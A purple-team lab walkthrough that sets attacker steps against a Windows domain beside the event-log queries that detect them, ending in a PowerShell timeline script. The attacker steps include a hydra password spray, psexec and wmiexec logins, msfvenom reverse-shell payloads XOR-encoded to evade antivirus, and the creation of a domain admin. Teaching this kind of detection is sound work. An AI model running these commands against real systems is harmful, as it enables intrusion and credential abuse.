Attacker launches password spray

Attacker
Password spray:
hydra -L users.txt -P seasons-2023.txt 192.168.37.237 smb -u

Defender
Count successful (4624) and failed (4625) logons:
Get-WinEvent -Path C:\labs\valkyrie-security-logons.evtx | Group-Object Id -NoElement | sort Count
Attacker uses sprayed credentials to attempt to log in via Metasploit's psexec

Attacker
msfconsole
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.37.237
msf6 > set SMBUser fgaeta
msf6 > set SMBPass W1nter2023!
msf6 > exploit

Defender
Service was created (System event 7045, before Defender killed it):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-system.evtx"; ID=7045} | fl
Command was executed (Security event 4688):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-security.evtx"; ID=4688} | Where {$_.Message -like "*powershell.exe -nop*"} | fl
Windows Defender Antivirus killed the connection (Defender event 1117, action taken):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-defender.evtx"; ID=1117} | Where {$_.Message -like "*powershell.exe -nop*"} | fl
Attacker logs in with wmiexec.py

Attacker
wmiexec.py fgaeta:W1nter2023\!@192.168.37.237

Defender
Microsoft Defender Antivirus: zero logs.
Sysmon event 1 (and Security event 4688) shows WmiPrvSE.exe launching cmd.exe and redirecting its output to the ADMIN$ share:
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-sysmon.evtx"; ID=1} | Where {$_.Message -like "*ADMIN$*"} | fl
Attacker runs 'whoami -all'

Attacker
whoami -all

Defender
Sysmon logged the command:
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-sysmon.evtx"} | Where {$_.Message -like "*whoami*"} | fl
Attacker creates plan.exe with msfvenom

Attacker
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.37.203 LPORT=8080 -x notepad.exe -f exe > plan.exe

Attacker uploads plan.exe via wmiexec.py's lput, tries to run it, and fails.

Defender
Upload (Sysmon event 11, file created):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-sysmon.evtx"; ID=11} | Where {$_.Message -like "*plan.exe*"} | fl
The command executed (Sysmon event 1):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-sysmon.evtx"; ID=1} | Where {$_.Message -like "*Image: C:\Users\fgaeta\plan.exe*"} | fl
Then Windows Defender killed it (Defender event 1116, malware detected):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-defender.evtx"; ID=1116} | Where {$_.Message -like "*plan.exe*"} | fl | more
Attacker uses xor encoding and re-uploads plan.exe

Attacker
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.37.203 LPORT=8080 -i 10 -e x64/xor_dynamic -x notepad.exe -f exe > plan.exe
The key difference: -e x64/xor_dynamic (run for 10 iterations with -i 10)
Upload and execute. This time the reverse meterpreter shell connects back to Metasploit.

Defender
Upload/execution: same events as before.
Reverse shell connection to port 8080 (Sysmon event 3, network connection):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-sysmon.evtx"; ID=3} | Where {$_.Message -like "*plan.exe*"} | fl
Attacker runs getsystem

Attacker
getsystem fails, so the attacker enables RDP. The attacker then logs in via RDP and disables Windows Defender Antivirus.

Defender
Windows Defender Antivirus kills the getsystem command (Defender event 1117):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-defender.evtx"; ID=1117} | fl | more
RDP is enabled (Sysmon event 1 for the command, System event 7040 for the service start-type change):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-sysmon.evtx"; ID=1} | Where {$_.Message -like "*remotedesktop*"} | fl
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-system.evtx"; ID=7040} | Where {$_.Message -like "*remote*"} | fl
Attacker runs getsystem again

Attacker
getsystem is successful, so the attacker migrates the meterpreter DLL into another process and steals a domain admin token.

Defender
Process migration (Sysmon event 8, CreateRemoteThread):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-sysmon.evtx"; ID=8} | Where {$_.Message -like "*plan.exe*"} | fl
Nothing was logged during the token theft and impersonation of GALACTICA/Administrator.
Attacker becomes domain admin

Attacker
Attacker runs meterpreter's shell command.
Attacker creates a domain account.
Attacker uses wmic to add the new account to the Domain Admins group.

Defender
Account creation (Security event 4720, on the domain controller's log):
Get-WinEvent -FilterHashtable @{Path="C:\labs\pegasus-security.evtx"; ID=4720} | fl
New domain admin (Security event 4737):
Get-WinEvent -FilterHashtable @{Path="C:\labs\pegasus-security.evtx"; ID=4737} | fl
Attacker RDPs into the domain controller and verifies they are a domain admin

Final step: attacker clears the logs

Defender
Security log cleared (Security event 1102):
Get-WinEvent -FilterHashtable @{Path="C:\labs\valkyrie-security.evtx"; ID=1102} | fl
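The individual hunts above can be run as one pass over the lab .evtx files and merged into a single timeline. This is an added example, not code from the talk or its repository; it assumes the files sit in C:\labs under the names used above, and the hunt names and the Get-LabTimeline function are mine.

```powershell
# Added example: replay every hunt from the page across the lab .evtx files
# and emit one sorted timeline. Assumes the files live in C:\labs as above.
$LabDir = 'C:\labs'

# Each hunt: log file, event ID(s), and an optional wildcard on the message text.
$Hunts = @(
    @{ Name='Failed logons (spray)';        File='valkyrie-security.evtx'; Id=4625 },
    @{ Name='Service installed (psexec)';   File='valkyrie-system.evtx';   Id=7045 },
    @{ Name='PowerShell -nop (4688)';       File='valkyrie-security.evtx'; Id=4688; Match='*powershell.exe -nop*' },
    @{ Name='Defender detected/acted';      File='valkyrie-defender.evtx'; Id=1116,1117 },
    @{ Name='WMI -> cmd.exe to ADMIN$';     File='valkyrie-sysmon.evtx';   Id=1;    Match='*ADMIN$*' },
    @{ Name='plan.exe written';             File='valkyrie-sysmon.evtx';   Id=11;   Match='*plan.exe*' },
    @{ Name='plan.exe network connect';     File='valkyrie-sysmon.evtx';   Id=3;    Match='*plan.exe*' },
    @{ Name='Remote thread (migrate)';      File='valkyrie-sysmon.evtx';   Id=8;    Match='*plan.exe*' },
    @{ Name='RDP service start type';       File='valkyrie-system.evtx';   Id=7040; Match='*remote*' },
    @{ Name='Account created (DC)';         File='pegasus-security.evtx';  Id=4720 },
    @{ Name='Group changed (DC)';           File='pegasus-security.evtx';  Id=4737 },
    @{ Name='Security log cleared';         File='valkyrie-security.evtx'; Id=1102 }
)

function Get-LabTimeline {
    param([string]$Dir = $LabDir, [array]$Rules = $Hunts)
    foreach ($h in $Rules) {
        $path = Join-Path $Dir $h.File
        if (-not (Test-Path $path)) { Write-Warning "missing $path"; continue }
        # Get-WinEvent errors when a filter matches nothing; treat that as an empty result.
        $events = Get-WinEvent -FilterHashtable @{ Path=$path; Id=$h.Id } -ErrorAction SilentlyContinue
        if ($h.Match) { $events = $events | Where-Object { $_.Message -like $h.Match } }
        foreach ($e in $events) {
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Hunt    = $h.Name
                EventId = $e.Id
                # First line of the message is the event's one-line description.
                Summary = ("$($e.Message)" -split "`n")[0].Trim()
            }
        }
    }
}

# Oldest first, so the spray, psexec, wmiexec, plan.exe, RDP and DC steps line up in order.
Get-LabTimeline | Sort-Object Time | Format-Table -AutoSize
```

The 4625 row count alone is the spray indicator; pipe Get-LabTimeline into Group-Object Hunt -NoElement to see per-hunt totals instead of the full list.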
https://github.com/eric-conrad/c2-talk